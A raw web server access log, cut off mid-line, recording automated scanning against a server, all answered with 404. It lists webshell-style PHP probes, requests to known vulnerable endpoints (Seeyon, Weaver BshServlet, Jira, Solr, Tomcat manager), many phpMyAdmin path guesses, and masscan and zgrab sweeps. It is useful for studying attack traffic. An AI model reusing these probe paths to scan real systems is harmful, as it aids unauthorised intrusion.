"POST /888.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:08 UTC] "POST /aa.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:09 UTC] "POST /bb.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:12 UTC] "POST /pp.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:12 UTC] "POST /tt.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:16 UTC] "POST /bbq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:16 UTC] "POST /jj1.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:16 UTC] "POST /jbb.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:20 UTC] "POST /qwq.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:24 UTC] "POST /nb.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:28 UTC] "POST /hgx.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:33 UTC] "POST /tty.php" 404 0 "" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" +152.136.192.51 unknown unknown [03/31 08:04:35 UTC] "GET /seeyon/htmlofficeservlet" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:36 UTC] "GET /secure/ContactAdministrators!default.jspa" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:36 UTC] "GET /weaver/bsh.servlet.BshServlet" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:37 UTC] "GET /solr/" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" +152.136.192.51 unknown unknown [03/31 08:04:40 UTC] "POST /index.php" 404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" +152.136.192.51 unknown unknown [03/31 08:04:45 UTC] "POST /user/register" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0" +152.136.192.51 unknown unknown [03/31 08:04:48 UTC] "GET /joomla/" 404 0 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)" +152.136.192.51 unknown unknown [03/31 08:04:48 UTC] "POST /user.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:04:48 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:04:51 UTC] "GET /phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:04:56 UTC] "GET /pma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:03 UTC] "GET /PMA2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:05 UTC] "GET /pmamy/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:09 UTC] "GET /pmamy2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:12 UTC] "GET /admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:12 UTC] "GET /db/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:16 UTC] "GET /dbadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:19 UTC] "GET /admin/pma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:21 UTC] "GET /admin/PMA/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:24 UTC] "GET /admin/mysql/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:24 UTC] "GET /admin/mysql2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:24 UTC] "GET /admin/phpmyadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:25 UTC] "GET /admin/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:27 UTC] "GET /admin/phpmyadmin2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:28 UTC] "GET /mysqladmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:28 UTC] "GET /mysql-admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:29 UTC] "GET /mysql_admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:32 UTC] "GET /phpAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:32 UTC] "GET /phpmyadmin0/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:32 UTC] "GET /phpmyadmin1/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:33 UTC] "GET /phpmyadmin2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:41 UTC] "GET /phpMyAdmin4.8.0/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:47 UTC] "GET /phpMyAdmin4.8.2/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:48 UTC] "GET /phpMyAdmin4.8.3/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:48 UTC] "GET /phpMyAdmin4.8.4/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:53 UTC] "GET /myadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:56 UTC] "GET /xampp/phpmyadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:56 UTC] "GET /phpMyadmin_bak/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:56 UTC] "GET /www/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:57 UTC] "GET /tools/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:05:59 UTC] "GET /phpMyAdminold/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:00 UTC] "GET /phpMyAdmin.old/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:00 UTC] "GET /pma-old/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:05 UTC] "GET /claroline/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:05 UTC] "GET /typo3/phpmyadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:05 UTC] "GET /phpma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:08 UTC] "GET /phpMyAdmin/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:09 UTC] "GET /phpMyAbmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:09 UTC] "GET /phpMyAdmin__/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:12 UTC] "GET /phpMyAdmin ---/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:12 UTC] "GET /v/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:12 UTC] "GET /phpmyadm1n/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:13 UTC] "GET /phpMyAdm1n/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:15 UTC] "GET /phpMyadmi/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:17 UTC] "GET /phpMyAdmion/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:20 UTC] "GET /MyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:20 UTC] "GET /phpMyAdmin1/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:21 UTC] "GET /phpMyAdmin123/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:22 UTC] "GET /pwd/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:24 UTC] "GET /phpMyAdmina/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:24 UTC] "GET /phpMydmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:24 UTC] "GET /phpMyAdmins/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:26 UTC] "GET /phpMyAdmin._/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:27 UTC] "GET /phpmyadmin2222/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:28 UTC] "GET /phpMyAdmin333/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:28 UTC] "GET /phpmyadmin3333/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:30 UTC] "GET /php2MyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:32 UTC] "GET /phpiMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:33 UTC] "GET /phpNyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:33 UTC] "GET /1/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:36 UTC] "GET /download/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:37 UTC] "GET /phpMyAdmin_111/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:39 UTC] "GET /321/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:40 UTC] "GET /123131/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:40 UTC] "GET /phpMyAdminn/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:42 UTC] "GET /phpMyAdminhf/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:43 UTC] "GET /WWW/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:48 UTC] "GET /phpMyAdmin_ai/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:48 UTC] "GET /__phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:48 UTC] "GET /program/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:49 UTC] "GET /shopdb/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:49 UTC] "GET /phppma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:52 UTC] "GET /phpmy/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:52 UTC] "GET /mysql/admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:52 UTC] "GET /mysql/dbadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:53 UTC] "GET /mysql/sqlmanager/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:53 UTC] "GET /mysql/mysqlmanager/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:53 UTC] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:54 UTC] "GET /sqladmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:56 UTC] "GET /sql/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:56 UTC] "GET /SQL/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:56 UTC] "GET /websql/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:57 UTC] "GET /MySQLAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:57 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" +23.225.172.10 unknown unknown [03/31 09:15:34 UTC] "CONNECT ip.ws.126.net:443" 404 0 "" "Go-http-client/1.1" +5.189.151.188 unknown unknown [03/31 09:23:39 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +5.189.151.188 unknown unknown [03/31 09:23:45 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +84.241.25.48 unknown unknown [03/31 09:26:13 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +167.99.40.21 unknown unknown [03/31 11:38:41 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +167.99.40.21 unknown unknown [03/31 11:38:44 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +167.99.40.21 unknown unknown [03/31 11:38:48 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +188.126.56.200 unknown unknown [03/31 11:52:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +31.220.48.125 unknown unknown [03/31 12:07:25 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +42.230.206.177 unknown unknown [03/31 12:15:39 UTC] "GET /setup.cgi" 404 0 "" "null" +5.188.210.101 unknown unknown [03/31 12:20:41 UTC] "GET http://5.188.210.101/echo.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" +162.243.129.179 unknown unknown [03/31 12:26:17 UTC] "GET /portal/redlion" 404 0 "" "Mozilla/5.0 zgrab/0.x" +139.162.106.181 unknown unknown [03/31 13:01:51 UTC] "GET /" 404 0 "" "HTTP Banner Detection (https://security.ipip.net)" +171.67.70.85 unknown unknown [03/31 13:17:30 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +122.160.15.69 unknown unknown [03/31 14:09:41 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +61.219.11.153 unknown unknown [03/31 15:35:02 UTC] "GET /" 404 0 "" "null" +139.99.141.237 unknown unknown [03/31 15:52:09 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +198.108.66.144 unknown unknown [03/31 16:20:32 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +80.82.65.234 unknown unknown [03/31 16:51:09 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" +94.182.51.146 unknown unknown [03/31 16:58:31 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +110.249.212.46 unknown unknown [03/31 17:53:09 UTC] "GET http://110.249.212.46/testget" 404 0 "" "null" +45.248.26.26 unknown unknown [03/31 18:10:03 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +171.67.70.85 unknown unknown [03/31 19:18:10 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +80.82.65.234 unknown unknown [03/31 19:47:47 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" +139.196.154.23 unknown unknown [03/31 21:36:11 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows 